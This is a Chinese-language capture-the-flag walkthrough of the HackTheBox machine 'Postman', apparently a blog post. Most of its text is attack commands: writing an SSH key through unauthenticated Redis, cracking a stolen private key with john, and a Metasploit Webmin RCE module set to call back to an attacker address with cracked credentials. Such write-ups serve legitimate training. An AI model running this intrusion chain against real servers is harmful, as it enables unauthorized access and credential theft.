Postman(HackTheBox)

HTB靶机wp

只为记录

redis未授权

ssh-keygen -t rsa -C "redis@fuck"
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
redis-cli -h 10.10.10.160 flushall
cat ssh.txt | redis-cli -h 10.10.10.160 -x set ssh_key
redis-cli -h 10.10.10.160
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG GET dir
CONFIG SET dbfilename "authorized_keys"
save
ssh -i fuck redis@10.10.10.160

连上去没有权限,使用这个提权 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

找到一个敏感信息

[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak

Matt用户的id_rsa.bak把他保存到本地为matt_key

要想使用john来破解,先要将其转为john支持的格式,这里使用ssh2john.py

./ssh2john.py /home/parrot/matt_key >  /home/parrot/matt_hash

这里要解压/usr/share/wordlists/rockyou.txt.gz
使用gunzip

john --wordlist=/usr/share/wordlists/rockyou.txt matt_hash
在这里插入图片描述

切换Matt用户

在这里插入图片描述

再次查看user.txt

在这里插入图片描述

得到一个flag

webmin

在这里插入图片描述
直接访问10.10.10.160:10000报错,修改本地hosts文件

再次访问,得到webmin的登录面板 使用Matt,computer2008可以登录

use exploit/linux/http/webmin_packageup_rce
set rhosts 10.10.10.160
set ssl true
set username Matt
set password computer2008
set lhost 10.10.14.207
exploit

在这里插入图片描述

本文参考

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值